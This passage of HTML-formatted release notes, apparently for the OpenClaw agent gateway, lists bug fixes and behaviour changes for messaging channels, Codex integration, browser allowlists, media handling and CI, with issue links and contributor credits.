<li>Agents/subagents: keep collect-mode announce queues batching unresolved-origin items with compatible same-route messages and resume collection after a true cross-channel drain when a later compatible batch remains. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468716265" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83577/hovercard" href="https://github.com/openclaw/openclaw/issues/83577">#83577</a>.</li>
<li>Providers/Anthropic: preserve native image input for current Claude model rows when stale local catalog data marks them text-only. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472508905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83756" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83756/hovercard" href="https://github.com/openclaw/openclaw/pull/83756">#83756</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Control UI: render live tool progress from session-scoped <code>session.tool</code> Gateway events so externally started runs show their tool cards in the active session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471865132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83734" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83734/hovercard" href="https://github.com/openclaw/openclaw/pull/83734">#83734</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Outbound: resolve send-capable channel plugins from the active runtime registry when the pinned startup registry only has setup metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471864947" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83733" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83733/hovercard" href="https://github.com/openclaw/openclaw/pull/83733">#83733</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Browser: enforce current-tab URL allowlist checks for <code>/act</code> evaluate/batch actions and <code>/highlight</code> routes while leaving tab-management actions unblocked. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392533668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78523" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78523/hovercard" href="https://github.com/openclaw/openclaw/pull/78523">#78523</a>)</li>
<li>CI: require real-behavior-proof verdict markers to come from the ClawSweeper GitHub App before accepting exact-head proof. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470892805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83692/hovercard" href="https://github.com/openclaw/openclaw/pull/83692">#83692</a>)</li>
<li>Models: show the effective OpenAI/Codex auth profile in <code>/models</code> provider headers instead of falling back to the OpenAI env-key label. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470946100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83697" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83697/hovercard" href="https://github.com/openclaw/openclaw/pull/83697">#83697</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yu-xin-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yu-xin-c">@yu-xin-c</a>.</li>
<li>Browser: keep a profile <code>cdpPort</code> when its <code>cdpUrl</code> omits a port, while still letting explicitly written URL ports win. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454473920" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82166" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82166/hovercard" href="https://github.com/openclaw/openclaw/pull/82166">#82166</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Agents/image generation: allow distinct <code>image_generate</code> prompts to start separate session-backed background tasks while same-prompt retries still return the active task status. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469561038" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83614/hovercard" href="https://github.com/openclaw/openclaw/pull/83614">#83614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Elarwei001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Elarwei001">@Elarwei001</a>.</li>
<li>Gateway/WebChat: honor configured <code>channels.webchat.textChunkLimit</code> and <code>chunkMode</code> overrides when chunking WebChat replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471165614" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83713" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83713/hovercard" href="https://github.com/openclaw/openclaw/pull/83713">#83713</a>)</li>
<li>Control UI: stop the chat reading indicator from sticking after an assistant response finishes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467410605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83515/hovercard" href="https://github.com/openclaw/openclaw/pull/83515">#83515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/njuboy11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/njuboy11">@njuboy11</a>.</li>
<li>Skills: reject empty or whitespace-only skill names and descriptions during quick validation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992930563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27061" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/27061/hovercard" href="https://github.com/openclaw/openclaw/pull/27061">#27061</a>)</li>
<li>Sessions: skip trailing custom transcript entries when checking tail assistant replies so embedded CLI gap-fill does not duplicate canonical assistant output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469910900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83635" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83635/hovercard" href="https://github.com/openclaw/openclaw/pull/83635">#83635</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yaoyi1222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yaoyi1222">@yaoyi1222</a>.</li>
<li>Memory Wiki: keep <code>wiki_lint</code> tool output path-safe by reporting vault-internal lint reports as relative paths in tool text and details while preserving absolute report paths for CLI/file callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466350048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83439" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83439/hovercard" href="https://github.com/openclaw/openclaw/pull/83439">#83439</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Telegram: keep verbose tool progress visible without mirroring non-final progress into active session transcripts, preventing embedded provider replies from aborting mid-run. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469858032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83631/hovercard" href="https://github.com/openclaw/openclaw/pull/83631">#83631</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kurplunkin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kurplunkin">@kurplunkin</a>.</li>
<li>Telegram: log successful outbound text and media deliveries with account, chat, message, operation, thread, reply, silent, and chunk metadata while keeping message bodies out of logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464232340" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83196/hovercard" href="https://github.com/openclaw/openclaw/issues/83196">#83196</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464712841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83247/hovercard" href="https://github.com/openclaw/openclaw/pull/83247">#83247</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jrwrest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jrwrest">@jrwrest</a>.</li>
<li>Cron: link isolated scheduled task runs to their stable cron session so task status and cleanup can follow the backing agent run. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469405023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83606/hovercard" href="https://github.com/openclaw/openclaw/pull/83606">#83606</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jai">@jai</a>.</li>
<li>CLI: enforce the documented Node.js 22.19 runtime floor in the source launcher.</li>
<li>Release stability: repair broad-gate regressions in requester-agent completion handoff, QA-Lab mock spawn attribution, Slack monitor test isolation, plugin uninstall peer fixtures, and Node-floor launcher contract coverage.</li>
<li>Agents/replies: persist queued follow-up user messages and assistant error stubs only once across model-fallback retries, preventing repeated provider rejections from corrupted same-role session transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465972914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83404/hovercard" href="https://github.com/openclaw/openclaw/issues/83404">#83404</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466078721" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83417" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83417/hovercard" href="https://github.com/openclaw/openclaw/pull/83417">#83417</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>Slack: persist delivered inbound message IDs and fail closed when same-channel thread replies lose their thread context, preventing delayed duplicate replies and accidental channel-root posts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467465571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83521" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83521/hovercard" href="https://github.com/openclaw/openclaw/issues/83521">#83521</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannon0430/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannon0430">@shannon0430</a>.</li>
<li>Codex app-server: complete OpenClaw dynamic tool diagnostics at the request boundary so successful, failed, timed out, aborted, and blocked tool calls do not leave active tool state behind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466827129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83474/hovercard" href="https://github.com/openclaw/openclaw/issues/83474">#83474</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rozmiarD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rozmiarD">@rozmiarD</a>.</li>
<li>Gateway/config: keep config writes from failing on unrelated unresolved auth-profile SecretRefs while preserving live auth-profile runtime snapshots.</li>
<li>Gateway/sessions: clear stored CLI provider resume bindings on non-subagent <code>/reset</code> so the next turn starts a fresh provider-side CLI conversation instead of resuming old context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466450765" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83448/hovercard" href="https://github.com/openclaw/openclaw/pull/83448">#83448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonyliu">@jasonyliu</a>.</li>
<li>Doctor: preserve legacy whole-agent Claude CLI intent by moving matching Anthropic model selections to model-scoped runtime policy before removing stale runtime pins. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467068699" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83491/hovercard" href="https://github.com/openclaw/openclaw/issues/83491">#83491</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danielcrick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danielcrick">@danielcrick</a>.</li>
<li>Discord/OpenAI: keep realtime Discord voice sessions hearing follow-up turns with OpenAI realtime and prebuffer assistant playback to avoid choppy starts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4417674952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80505/hovercard" href="https://github.com/openclaw/openclaw/pull/80505">#80505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>LM Studio: resolve env-template API keys like <code>${LMSTUDIO_API_KEY}</code> through the standard SecretInput path instead of sending the raw template as the bearer token, and preserve header-auth and discovery-key precedence when the template is unset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4417527708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80495" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80495/hovercard" href="https://github.com/openclaw/openclaw/issues/80495">#80495</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4418547191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80568" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80568/hovercard" href="https://github.com/openclaw/openclaw/pull/80568">#80568</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a>.</li>
<li>Discord/subagents: route the initial reply from thread-bound delegated sessions into the bound Discord thread instead of the parent channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464042454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83170" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83170/hovercard" href="https://github.com/openclaw/openclaw/issues/83170">#83170</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464046468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83172" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83172/hovercard" href="https://github.com/openclaw/openclaw/pull/83172">#83172</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>.</li>
<li>Gateway/sessions: rotate failed agent sessions when their transcript file is missing instead of wedging per-channel lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467000680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83488" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83488/hovercard" href="https://github.com/openclaw/openclaw/issues/83488">#83488</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468120214" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83553" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83553/hovercard" href="https://github.com/openclaw/openclaw/pull/83553">#83553</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Media: prevent image metadata probing from invoking external decoder delegates on unrecognized image bytes, and stop fallback chaining after real processing errors.</li>
<li>Media: install Sharp with the root package and fall back to sips, Windows native imaging, ImageMagick, GraphicsMagick, or ffmpeg for image resizing/conversion when Sharp is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465939099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83401" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83401/hovercard" href="https://github.com/openclaw/openclaw/issues/83401">#83401</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scotthuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scotthuang">@scotthuang</a>.</li>
<li>Telegram: deliver generated media completions back into forum topics by preserving topic IDs across requester-agent handoff. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468244035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83556/hovercard" href="https://github.com/openclaw/openclaw/pull/83556">#83556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Gateway: defer update-check startup until after readiness so package update checks no longer block sidecar-ready startup, while preserving update broadcasts and shutdown cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467462415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83520/hovercard" href="https://github.com/openclaw/openclaw/pull/83520">#83520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Telegram: keep <code>/btw</code> and read-only status commands from aborting active runs, and avoid retaining raw update payloads in timed-out spool tombstones. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464995305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83272" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83272/hovercard" href="https://github.com/openclaw/openclaw/issues/83272">#83272</a>.</li>
<li>Agents: log strict-agentic execution contract diagnostics only when the planning-only retry path actually triggers.</li>
<li>Agents: stop embedded session takeover and session write-lock errors from consuming model fallbacks while preserving provider fallback metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467367566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83510" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83510/hovercard" href="https://github.com/openclaw/openclaw/issues/83510">#83510</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Agents/video: hide <code>video_generate</code> reference-audio parameters unless a registered video provider supports audio inputs.</li>
<li>Plugins: fall back to npm for official ClawHub updates when artifact downloads are unavailable, including beta-to-default fallback and dry-run version reporting.</li>
<li>Plugins/xAI: echo PKCE challenge fields during OAuth authorization-code token exchange for xAI token-endpoint compatibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467208552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83499/hovercard" href="https://github.com/openclaw/openclaw/pull/83499">#83499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Codex app-server: hydrate current inbound image attachments before queued runs so Responses-backed agents receive Discord and other channel images as native vision input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466691440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83466" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83466/hovercard" href="https://github.com/openclaw/openclaw/issues/83466">#83466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iannwu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iannwu">@iannwu</a>.</li>
<li>Codex app-server: keep native code mode available without forcing code-mode-only so OpenClaw dynamic tool turns complete through the app-server tool bridge. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463653395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83109" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83109/hovercard" href="https://github.com/openclaw/openclaw/issues/83109">#83109</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daswass/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daswass">@daswass</a>.</li>
<li>Release stability: recover stale session diagnostics and Codex OAuth fallback state so stuck runs and reused refresh tokens clear without blocking follow-up work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467223870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83503/hovercard" href="https://github.com/openclaw/openclaw/pull/83503">#83503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Messages/TTS: apply TTS directives before message-tool sends reach core, gateway, or plugin delivery so opt-in message-tool rooms and proactive sends attach voice notes instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442404677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81598" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81598/hovercard" href="https://github.com/openclaw/openclaw/issues/81598">#81598</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CG-Intelligence-Agent-Jack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CG-Intelligence-Agent-Jack">@CG-Intelligence-Agent-Jack</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CoronovirusG10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CoronovirusG10">@CoronovirusG10</a>.</li>
<li>Messages/Codex: keep Codex direct/source chats on message-tool visible delivery by default while documenting and testing <code>messages.visibleReplies: "automatic"</code> as the old-mode opt-out; channel wildcard model overrides now apply to direct chats before harness delivery defaults.</li>
<li>Memory/QMD: keep archived session transcript hits visible after QMD export while preserving normal <code>.md</code> session ids that only resemble archive names. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467447669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83518" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83518/hovercard" href="https://github.com/openclaw/openclaw/pull/83518">#83518</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467252934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83506" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83506/hovercard" href="https://github.com/openclaw/openclaw/issues/83506">#83506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tanshanshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tanshanshan">@tanshanshan</a>.</li>
<li>Codex app-server: preserve network access for sandboxed Codex code-mode turns when the OpenClaw sandbox allows outbound egress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465477650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83347" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83347/hovercard" href="https://github.com/openclaw/openclaw/issues/83347">#83347</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YusukeIt0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YusukeIt0">@YusukeIt0</a>.</li>
<li>QA-Lab: keep the OTLP smoke decoder independent of removed OpenTelemetry generated-root internals.</li>
<li>Messages: default group/channel visible replies to automatic final delivery again, keeping <code>message_tool</code> opt-in for ambient/shared rooms and tool-reliable models.</li>
<li>CLI/TUI: force standalone <code>/exit</code> runs to terminate after <code>runTui</code> returns so onboarding-launched TUI children do not stay alive invisibly. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467214589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83501/hovercard" href="https://github.com/openclaw/openclaw/pull/83501">#83501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Agents/code mode: honor per-agent code-mode config in schema, runtime catalog activation, and model payload filtering. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465758765" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83388" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83388/hovercard" href="https://github.com/openclaw/openclaw/issues/83388">#83388</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Agents/code mode: preserve agent, session, run, and channel context in <code>before_tool_call</code> hooks for top-level <code>exec</code>/<code>wait</code> dispatches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465758470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83387" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83387/hovercard" href="https://github.com/openclaw/openclaw/issues/83387">#83387</a>.</li>
<li>QQBot: shorten C2C typing indicators to a 10-second window renewed every 5 seconds, capped to keep a final passive-reply slot available. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466707249" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83469/hovercard" href="https://github.com/openclaw/openclaw/pull/83469">#83469</a>)</li>
<li>Replies: keep final payload delivery after live preview updates so channels can finalize or send the completed answer instead of losing preview-only drafts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466706226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83468" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83468/hovercard" href="https://github.com/openclaw/openclaw/pull/83468">#83468</a>)</li>
<li>Discord: deliver final replies in progress-mode preview streams instead of deduplicating the final visible message. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466374427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83443/hovercard" href="https://github.com/openclaw/openclaw/pull/83443">#83443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/compoodment/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/compoodment">@compoodment</a>.</li>
